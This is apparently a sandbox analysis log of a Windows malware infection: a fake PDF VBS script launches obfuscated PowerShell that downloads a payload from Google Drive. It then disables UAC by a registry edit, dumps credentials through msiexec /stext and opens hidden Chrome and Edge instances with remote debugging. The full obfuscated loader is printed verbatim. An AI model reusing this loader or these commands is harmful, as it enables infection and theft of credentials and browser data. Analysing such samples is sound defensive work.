PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Haplophase Brandmnds Bagatellishcr Taagers #><#Medaljetagers Mizrah raptusser Wapiti Interpellerede Selvjustitsens #>$truckings='Supinity';function Galliumoxidernes($Bortrive){If ($host.DebuggerEnabled) {$Ringkbingerens++;$Rollefag=$Bortrive.'Length' - $Ringkbingerens} for ( $Overskrider123=4;$Overskrider123 -lt $Rollefag;$Overskrider123+=5){$Entitledness86=$Overskrider123;$Imponed+=$Bortrive[$Overskrider123]}$Imponed}function Midtpunktsgendes($Shippingmnd0){ .($Matzas) ($Shippingmnd0)}$Laborhood=Galliumoxidernes ' Bi NRestEPa dTCont.Bon wHomeES umb.arccLiteLMakrI PteES pen acitspi ';$Tait=Galliumoxidernes 'AfblMAjleoEksazF lki SkalD.gtl etha Sta/Over ';$ectoenzym=Galliumoxidernes 'S heTIodol rinsAura1Cata2S.gf ';$Stens=' Ce [Taa.N ieE skit Av..Ano SbriseHo orStjkVNonii OseC .enEA enPEle,OStuli CinnDukkTbranMDrafAEpicnBlikA Demg ProEBan,r udv] Sur:nd a:NewssOphiE.layC R muMed r ReaI In T Udsy SetPToxor ilOCal T fruOSideC.ehaOOverlEl v=Pare$WorlEPas CRabbtEnvoOheeleOplanCutwzLeukyPostM Jen ';$Tait+=Galliumoxidernes 'Gr,s5Bomb.tn,e0 Pit rem (g deWAk ii alin Pr d To oInmew A tsPa a irreNUnidTJern C,em1Eury0Salv.Baar0Dist; gra GennWFueliNi snReor6Anti4 ma ;Coun Ku.sxSn,k6Ammo4Mout;S ri ri erKontvSv n: Dep1Bdel3th r1 Uri.,lev0Co i)Ekso N,nmGT eaeS udc boxkFedtoD,te/ L e2Aero0Sejr1Bill0 C,n0Coag1 Hed0Acco1Iodi GlaFLyesi Sver GroeWeatf ProoSkrixCamo/D,ms1 Bul3Ann 1Rib .Skol0,ett ';$hundyrene=Galliumoxidernes 'ForkUtapss .tueSittR yal-DafnaEnerGPl.mEc abnP.toTEner ';$Amorists=Galliumoxidernes 'L.neh SnitplantD cipElvesMo c: Hje/Re u/Di edUnc rStruiFortv St,eRamp.ToadgForuoAutoo UdggSor lAntleRe e.ButccS igo StemRens/ ,pruPr,scSemi? uleUndexMe epA reo IndrObsttAn,i=SupedDeleo Wa w igensprilSvi oBrneaNethd ndf&MahoiCowrdF.tt= Par1 lliH illUIn.ioGelaqfdev1ProcEBaadWAv nh afltBlitpSy tFSubbMMbletLagoQ Ju 4 U,eSLifl4 G lvShawWTornCO hn1 KonFTrfly ydGGelis vigkInva_.lkaLStumFA ti2 .ee5.rgajIn s ';$Motorcykelen=Galliumoxidernes 'Anth>Libr ';$Matzas=Galliumoxidernes 'PermISygee orxLikv ';$Vireo='Grevekrone';$Princippets67='\Khets.Ser';Midtpunktsgendes (Galliumoxidernes 'Form$OverGS bclAurio.ikpBKiloAdagfLUno :SammRShipAAvelG eu,g Bire MulnF,te=Benz$PublE EksnAf aV Han:BesiATurnPSynkp DiaDOv,raBesktFor.aMund+Elwi$ MajPForeRf reiSawyNHellCHon Iove PSomnPKorrE ilftHighSBio.6Appe7Unin ');Midtpunktsgendes (Galliumoxidernes 'Over$Paulg nrelbarboTvanb ja,ABackL M j:,pertRefrYHallVBorgS.remTPodajLobbA nfAappoL ynkECountda.k=Hal,$S.tuASta.M MaaoFl er oseIHemosCancT .ncsOver.RekosDownpG.ldLShetICateT Pro( Res$ad im Di,o EttT andOPhlerLedicPe syRygskS ksemicrLUnprEBettnC ro)atom ');Midtpunktsgendes (Galliumoxidernes $Stens);$Amorists=$Tyvstjaalet[0];$Antorbital69=(Galliumoxidernes 'R ef$ SvrgRooflbestoOmniBSpurA aulForb:ProvBSpiloKineLRen s MurhInitE AhavK mpiDespKtohni ,hoaCh fn Clo=disaNGraseFolkw esi-EnigoTrkkBMutaJMil e ShacTakttrakk Quins AnmyUnshsDuckTM,lle IncmLige.Etho$ fbaLJe rAEcbaBPaleOToter BlohThroo .onO ,ohDMest ');Midtpunktsgendes ($Antorbital69);Midtpunktsgendes (Galliumoxidernes 'Irid$StalBreboo ierlSelvsByplhDelee AfvvRestiMic,k PoliTanda A enT gl.VideHMalkeSanda BaddMo eeUtoprHa,ms ap[Naah$SilvhInteuTermnV jrd iasy Cror rbe La n DeleSuc,]Totu=E.ma$GletT Su aFa ti .hetBygh ');$sportsbegivenheden=Galliumoxidernes ' ni.$ FliBGulpoDi ilV tsscop hTrveeKomiv AfhiInflkHarmiRefra egn.ove.Dis DBundoDebawDecenStyllFireo InfaI,mjdKajaFSup.iFin l abeAnti(Appl$udsaAPhi.mCalvoDisirUnapiScarsTilbt OvesFung,Brun$KamiDThyre,eettCosmaStyrcK,nkhAlmieCondmForreAmobnove tAn beb,smr LocnUnsue Dir)Ab.a ';$Detachementerne=$Raggen;Midtpunktsgendes (Galliumoxidernes 'Chee$ rosg Dokl.karoJettBXy oaGipslElef:M krBAchyaOptis orsI HanN ApaF veruWiriL Bes= .ub(D,ggTRet eTireSHypeTUncr-TiggpfayaaUnmetSu ehSeri Nu,e$StudDultrERe iTfe ka IriCKronH UdfeCarrm krbERa,eNG.let CytE ModRAfstnLympEBet,)Hu d ');while (!$basinful) {Midtpunktsgendes (Galliumoxidernes 'Pas,$ungug PaalAfs.o Neobc,rra SpalUdes:Tap UOkk,nLar p ShouSpejm ljdpRes a S abSupel Op ePyr =Ultr$,rvetTuskr Z nu Un e nds ') ;Midtpunktsgendes $sportsbegivenheden;Midtpunktsgendes (Galliumoxidernes 'Mo is Dd,tSeroaSygerOvisTInda-NudiSCatslHymne InfeforepRekr Samm4Idee ');Midtpunktsgendes (Galliumoxidernes 'Frst$ ecoGOpkoLPiluOStomBMispaClarLDiff:ProsBuddya xplS indI HavnUn eFUd iuSynbl Fle=.nas(occuT LedEsp rSAf bTKvin-Pantp ManAStbetErn H ugt Vesi$AssidNatue ekt SlyA UndC VithBehaE SemMDagsE P,eNMellTtab EViklRFe sNO.seeMism)C.oi ') ;Midtpunktsgendes (Galliumoxidernes 'Scha$ SugGA pilDagsOHedgbAboraSk lLInel: vrebG,teOJohal LabdBir bEmbra ilnNJaroeKrafRNoni=In c$Tr sG riplBandoTredBScruAStoplBe r: Leug,aftrDil aS.kbVDec HH ppuEdwanUtild Ba eSnoonCoinE brdsIndl+Comp+Knsd%Pneu$Extrt ilaYse ev RstsSkivTSmutj MonaS.anA.addlUha E ForTS gn. Magc andOSeveUHierN nyoTMuck ') ;$Amorists=$Tyvstjaalet[$Boldbaner]}$Dinornithiformes=335350;$Udskrivninger=30943;Midtpunktsgendes (Galliumoxidernes 'Bari$CalcgAnkrl OpfoAfpaBRamma To.lIn t: PloMForhI.iptnMeriDmarys WomT TekEEqu,LGougNDkfaSFryt Fjer=Kode UopsGBam E .ngtGeor- DevCMaaloBerbN ilktStifEOffrN Bint Arc Unif$ThawdPrefER tutEli,A MotcKkkeh MilERecimkrabE razNGlantPatrEElfor Blonaduse ele ');Midtpunktsgendes (Galliumoxidernes 'Maan$ .reg raul M soFanabbarlaanthl mai: ReaBPahoyHensrAminoHeadn emiWeapsAntit Mu 1lgpl8Fina Ek p=Bass Slaf[nowtSFanty Consp ratLeroe Form Fr .Dro COrdnoSammnDi.avPredeGh srMasst ubp]Dity:Form:ProkFL.evrPocho.fskmSp jBK elaGunysRet eHjae6d ke4Lep SperrtFre.rBe.uiVelsnCo tgMala( ini$Squ.MRecoiuvicnSu gdE itsForotpre ePopkl NonnCra sIne,) Ba, ');Midtpunktsgendes (Galliumoxidernes 'Smre$ HemGwanhLFagjoSystbSl.maStablAl y:Bge RKri I FritDisjeBrnelGr pyDepo1N nm4Si,k3Sava Angs=En g Kons[BlomSFlouYSi.uS pret alaESaufm An,.P lsTFurnE icxf ekT ogr.Rov E laaN G ucSkavoKi kd erpi UninCorvGMagn]Beto: Lis:HeteaefteSBrydcSammiEgn iSeks.ForeGUdvie MarTD.meSB llt,nderuninI GstNSkjogKre (Uret$Warkb S,pYDestrTranORappnFeldI Fa S M.ntMono1Glan8 iek)Plas ');Midtpunktsgendes (Galliumoxidernes '.nko$PortgBefrLKloroGad,bPa raattaLZon,:FariA astU Ef tOptae NonnTryktDumaiUskoFAl nIWr tcEn eeDemorRagiEChe,n pr,D ntieOffesTors1 sut0kro 3 pi=Udlo$ fgirFu mICenttaarseT rrL elyHjor1Upcr4 Fyr3K nt.UdmesUds.u D,rB SniSHektt AgtrBackiRefoN BefgDung( Skf$ForedO,erIEspinHvelOHe.erS,renTelei Ud tlimnHHalsi objfKinooFrstRHazaMWaddeC roSDepa,Brsm$ Wo uSovsDSpe.SWitekNstmr naikalfvD chNPlanIscannPhalG Fage ndeR,ont) teg ');Midtpunktsgendes $Autentificerendes103;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Haplophase Brandmnds Bagatellishcr Taagers #><#Medaljetagers Mizrah raptusser Wapiti Interpellerede Selvjustitsens #>$truckings='Supinity';function Galliumoxidernes($Bortrive){If ($host.DebuggerEnabled) {$Ringkbingerens++;$Rollefag=$Bortrive.'Length' - $Ringkbingerens} for ( $Overskrider123=4;$Overskrider123 -lt $Rollefag;$Overskrider123+=5){$Entitledness86=$Overskrider123;$Imponed+=$Bortrive[$Overskrider123]}$Imponed}function Midtpunktsgendes($Shippingmnd0){ .($Matzas) ($Shippingmnd0)}$Laborhood=Galliumoxidernes ' Bi NRestEPa dTCont.Bon wHomeES umb.arccLiteLMakrI PteES pen acitspi ';$Tait=Galliumoxidernes 'AfblMAjleoEksazF lki SkalD.gtl etha Sta/Over ';$ectoenzym=Galliumoxidernes 'S heTIodol rinsAura1Cata2S.gf ';$Stens=' Ce [Taa.N ieE skit Av..Ano SbriseHo orStjkVNonii OseC .enEA enPEle,OStuli CinnDukkTbranMDrafAEpicnBlikA Demg ProEBan,r udv] Sur:nd a:NewssOphiE.layC R muMed r ReaI In T Udsy SetPToxor ilOCal T fruOSideC.ehaOOverlEl v=Pare$WorlEPas CRabbtEnvoOheeleOplanCutwzLeukyPostM Jen ';$Tait+=Galliumoxidernes 'Gr,s5Bomb.tn,e0 Pit rem (g deWAk ii alin Pr d To oInmew A tsPa a irreNUnidTJern C,em1Eury0Salv.Baar0Dist; gra GennWFueliNi snReor6Anti4 ma ;Coun Ku.sxSn,k6Ammo4Mout;S ri ri erKontvSv n: Dep1Bdel3th r1 Uri.,lev0Co i)Ekso N,nmGT eaeS udc boxkFedtoD,te/ L e2Aero0Sejr1Bill0 C,n0Coag1 Hed0Acco1Iodi GlaFLyesi Sver GroeWeatf ProoSkrixCamo/D,ms1 Bul3Ann 1Rib .Skol0,ett ';$hundyrene=Galliumoxidernes 'ForkUtapss .tueSittR yal-DafnaEnerGPl.mEc abnP.toTEner ';$Amorists=Galliumoxidernes 'L.neh SnitplantD cipElvesMo c: Hje/Re u/Di edUnc rStruiFortv St,eRamp.ToadgForuoAutoo UdggSor lAntleRe e.ButccS igo StemRens/ ,pruPr,scSemi? uleUndexMe epA reo IndrObsttAn,i=SupedDeleo Wa w igensprilSvi oBrneaNethd ndf&MahoiCowrdF.tt= Par1 lliH illUIn.ioGelaqfdev1ProcEBaadWAv nh afltBlitpSy tFSubbMMbletLagoQ Ju 4 U,eSLifl4 G lvShawWTornCO hn1 KonFTrfly ydGGelis vigkInva_.lkaLStumFA ti2 .ee5.rgajIn s ';$Motorcykelen=Galliumoxidernes 'Anth>Libr ';$Matzas=Galliumoxidernes 'PermISygee orxLikv ';$Vireo='Grevekrone';$Princippets67='\Khets.Ser';Midtpunktsgendes (Galliumoxidernes 'Form$OverGS bclAurio.ikpBKiloAdagfLUno :SammRShipAAvelG eu,g Bire MulnF,te=Benz$PublE EksnAf aV Han:BesiATurnPSynkp DiaDOv,raBesktFor.aMund+Elwi$ MajPForeRf reiSawyNHellCHon Iove PSomnPKorrE ilftHighSBio.6Appe7Unin ');Midtpunktsgendes (Galliumoxidernes 'Over$Paulg nrelbarboTvanb ja,ABackL M j:,pertRefrYHallVBorgS.remTPodajLobbA nfAappoL ynkECountda.k=Hal,$S.tuASta.M MaaoFl er oseIHemosCancT .ncsOver.RekosDownpG.ldLShetICateT Pro( Res$ad im Di,o EttT andOPhlerLedicPe syRygskS ksemicrLUnprEBettnC ro)atom ');Midtpunktsgendes (Galliumoxidernes $Stens);$Amorists=$Tyvstjaalet[0];$Antorbital69=(Galliumoxidernes 'R ef$ SvrgRooflbestoOmniBSpurA aulForb:ProvBSpiloKineLRen s MurhInitE AhavK mpiDespKtohni ,hoaCh fn Clo=disaNGraseFolkw esi-EnigoTrkkBMutaJMil e ShacTakttrakk Quins AnmyUnshsDuckTM,lle IncmLige.Etho$ fbaLJe rAEcbaBPaleOToter BlohThroo .onO ,ohDMest ');Midtpunktsgendes ($Antorbital69);Midtpunktsgendes (Galliumoxidernes 'Irid$StalBreboo ierlSelvsByplhDelee AfvvRestiMic,k PoliTanda A enT gl.VideHMalkeSanda BaddMo eeUtoprHa,ms ap[Naah$SilvhInteuTermnV jrd iasy Cror rbe La n DeleSuc,]Totu=E.ma$GletT Su aFa ti .hetBygh ');$sportsbegivenheden=Galliumoxidernes ' ni.$ FliBGulpoDi ilV tsscop hTrveeKomiv AfhiInflkHarmiRefra egn.ove.Dis DBundoDebawDecenStyllFireo InfaI,mjdKajaFSup.iFin l abeAnti(Appl$udsaAPhi.mCalvoDisirUnapiScarsTilbt OvesFung,Brun$KamiDThyre,eettCosmaStyrcK,nkhAlmieCondmForreAmobnove tAn beb,smr LocnUnsue Dir)Ab.a ';$Detachementerne=$Raggen;Midtpunktsgendes (Galliumoxidernes 'Chee$ rosg Dokl.karoJettBXy oaGipslElef:M krBAchyaOptis orsI HanN ApaF veruWiriL Bes= .ub(D,ggTRet eTireSHypeTUncr-TiggpfayaaUnmetSu ehSeri Nu,e$StudDultrERe iTfe ka IriCKronH UdfeCarrm krbERa,eNG.let CytE ModRAfstnLympEBet,)Hu d ');while (!$basinful) {Midtpunktsgendes (Galliumoxidernes 'Pas,$ungug PaalAfs.o Neobc,rra SpalUdes:Tap UOkk,nLar p ShouSpejm ljdpRes a S abSupel Op ePyr =Ultr$,rvetTuskr Z nu Un e nds ') ;Midtpunktsgendes $sportsbegivenheden;Midtpunktsgendes (Galliumoxidernes 'Mo is Dd,tSeroaSygerOvisTInda-NudiSCatslHymne InfeforepRekr Samm4Idee ');Midtpunktsgendes (Galliumoxidernes 'Frst$ ecoGOpkoLPiluOStomBMispaClarLDiff:ProsBuddya xplS indI HavnUn eFUd iuSynbl Fle=.nas(occuT LedEsp rSAf bTKvin-Pantp ManAStbetErn H ugt Vesi$AssidNatue ekt SlyA UndC VithBehaE SemMDagsE P,eNMellTtab EViklRFe sNO.seeMism)C.oi ') ;Midtpunktsgendes (Galliumoxidernes 'Scha$ SugGA pilDagsOHedgbAboraSk lLInel: vrebG,teOJohal LabdBir bEmbra ilnNJaroeKrafRNoni=In c$Tr sG riplBandoTredBScruAStoplBe r: Leug,aftrDil aS.kbVDec HH ppuEdwanUtild Ba eSnoonCoinE brdsIndl+Comp+Knsd%Pneu$Extrt ilaYse ev RstsSkivTSmutj MonaS.anA.addlUha E ForTS gn. Magc andOSeveUHierN nyoTMuck ') ;$Amorists=$Tyvstjaalet[$Boldbaner]}$Dinornithiformes=335350;$Udskrivninger=30943;Midtpunktsgendes (Galliumoxidernes 'Bari$CalcgAnkrl OpfoAfpaBRamma To.lIn t: PloMForhI.iptnMeriDmarys WomT TekEEqu,LGougNDkfaSFryt Fjer=Kode UopsGBam E .ngtGeor- DevCMaaloBerbN ilktStifEOffrN Bint Arc Unif$ThawdPrefER tutEli,A MotcKkkeh MilERecimkrabE razNGlantPatrEElfor Blonaduse ele ');Midtpunktsgendes (Galliumoxidernes 'Maan$ .reg raul M soFanabbarlaanthl mai: ReaBPahoyHensrAminoHeadn emiWeapsAntit Mu 1lgpl8Fina Ek p=Bass Slaf[nowtSFanty Consp ratLeroe Form Fr .Dro COrdnoSammnDi.avPredeGh srMasst ubp]Dity:Form:ProkFL.evrPocho.fskmSp jBK elaGunysRet eHjae6d ke4Lep SperrtFre.rBe.uiVelsnCo tgMala( ini$Squ.MRecoiuvicnSu gdE itsForotpre ePopkl NonnCra sIne,) Ba, ');Midtpunktsgendes (Galliumoxidernes 'Smre$ HemGwanhLFagjoSystbSl.maStablAl y:Bge RKri I FritDisjeBrnelGr pyDepo1N nm4Si,k3Sava Angs=En g Kons[BlomSFlouYSi.uS pret alaESaufm An,.P lsTFurnE icxf ekT ogr.Rov E laaN G ucSkavoKi kd erpi UninCorvGMagn]Beto: Lis:HeteaefteSBrydcSammiEgn iSeks.ForeGUdvie MarTD.meSB llt,nderuninI GstNSkjogKre (Uret$Warkb S,pYDestrTranORappnFeldI Fa S M.ntMono1Glan8 iek)Plas ');Midtpunktsgendes (Galliumoxidernes '.nko$PortgBefrLKloroGad,bPa raattaLZon,:FariA astU Ef tOptae NonnTryktDumaiUskoFAl nIWr tcEn eeDemorRagiEChe,n pr,D ntieOffesTors1 sut0kro 3 pi=Udlo$ fgirFu mICenttaarseT rrL elyHjor1Upcr4 Fyr3K nt.UdmesUds.u D,rB SniSHektt AgtrBackiRefoN BefgDung( Skf$ForedO,erIEspinHvelOHe.erS,renTelei Ud tlimnHHalsi objfKinooFrstRHazaMWaddeC roSDepa,Brsm$ Wo uSovsDSpe.SWitekNstmr naikalfvD chNPlanIscannPhalG Fage ndeR,ont) teg ');Midtpunktsgendes $Autentificerendes103;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe0cf9cc40,0x7ffe0cf9cc4c,0x7ffe0cf9cc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iemlyftohq"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lgswzydhvywktu"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2392 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4308,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe0c7446f8,0x7ffe0c744708,0x7ffe0c744718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

